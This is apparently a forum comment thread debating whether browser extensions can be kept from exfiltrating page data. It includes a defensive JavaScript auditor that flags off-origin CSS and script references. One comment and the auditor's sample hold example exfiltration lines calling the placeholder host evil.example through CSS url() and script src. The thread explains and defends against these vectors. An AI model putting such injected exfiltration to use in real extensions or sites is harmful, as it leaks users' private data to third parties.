
> they can inject arbitrary scripts into pages to make requests for them

disallow that behavior?

You could also just pull that code but it might change based on request origin...



Lots of the best extensions are basically "change this webpage when it loads to make it work better." You can't "disallow this behavior" without crippling them.


It could do all the processing locally, easily... what are you talking about?


>It could do all the processing locally, easily...

That's irrelevant. If you can make changes to the page, you can exfiltrate data. The security model for addons isn't designed with restricting an addon's network activity in mind; see my other post: https://news.ycombinator.com/item?id=25623281


Depends on what your addon does. Most addons modify the page in some way. It's also not limited to injecting JavaScript. You can also exfiltrate data by injecting CSS (e.g. doing something like background-image: url("http://evil.example/?payload=...")) or do JavaScript injection in alternate ways (e.g. adding a <script> element, or adding an onclick attribute).
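
A defender-side check for the vectors listed in the comment above, as an added example that is not part of the thread or any participant's code: it scans a snapshot of page markup for CSS url() references and script sources that resolve off-origin, plus inline scripts and on* handlers. The function name auditSnapshot and the origins shop.example and cdn.shop.example are hypothetical; evil.example is the placeholder host from the comment.

```javascript
// Added example: audit a markup/CSS snapshot for the vectors named above.
// Regex-based and deliberately simple; it is not a full HTML or CSS parser.
const CSS_URL = /url\(\s*(['"]?)([^'")]+)\1\s*\)/gi;
const SCRIPT_SRC = /<script\b[^>]*\bsrc\s*=\s*(['"])([^'"]+)\1/gi;
const INLINE_SCRIPT = /<script\b(?![^>]*\bsrc\s*=)[^>]*>/gi;
const INLINE_HANDLER = /<[a-z][^>]*\s(on[a-z]+)\s*=/gi;

// Returns a list of { kind, detail } findings. pageOrigin and allowedOrigins
// are supplied by the caller (hypothetical values in the sample below).
function auditSnapshot(snapshot, pageOrigin, allowedOrigins = []) {
  const allowed = new Set([pageOrigin, ...allowedOrigins]);
  const findings = [];
  const checkUrl = (kind, ref) => {
    let url;
    try {
      url = new URL(ref.trim(), pageOrigin); // resolves relative and // forms
    } catch {
      findings.push({ kind, detail: ref }); // unparsable: report, don't guess
      return;
    }
    if (url.protocol === "data:") return; // embedded data, no request is made
    if (!allowed.has(url.origin)) findings.push({ kind, detail: ref });
  };
  for (const m of snapshot.matchAll(CSS_URL)) checkUrl("css-url", m[2]);
  for (const m of snapshot.matchAll(SCRIPT_SRC)) checkUrl("script-src", m[2]);
  for (const m of snapshot.matchAll(INLINE_SCRIPT))
    findings.push({ kind: "inline-script", detail: m[0] });
  for (const m of snapshot.matchAll(INLINE_HANDLER))
    findings.push({ kind: "inline-handler", detail: m[1].toLowerCase() });
  return findings;
}

// Constructed sample: a page snapshot taken after something modified it.
const SAMPLE = `
<style>
  .logo { background-image: url("/static/logo.png"); }
  .x { background-image: url("http://evil.example/?payload=abc"); }
</style>
<script src="https://cdn.shop.example/app.js"></script>
<script src="//evil.example/t.js"></script>
<button onclick="track()">Buy</button>
<script>inlineCode()</script>
`;

function demo() {
  return auditSnapshot(SAMPLE, "https://shop.example", ["https://cdn.shop.example"]);
}
console.log(demo());
```

Comparing the findings for a snapshot taken with an extension enabled against one taken without it shows which of these changes the extension introduced.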


That's one of the most fundamental functions a browser extension could have



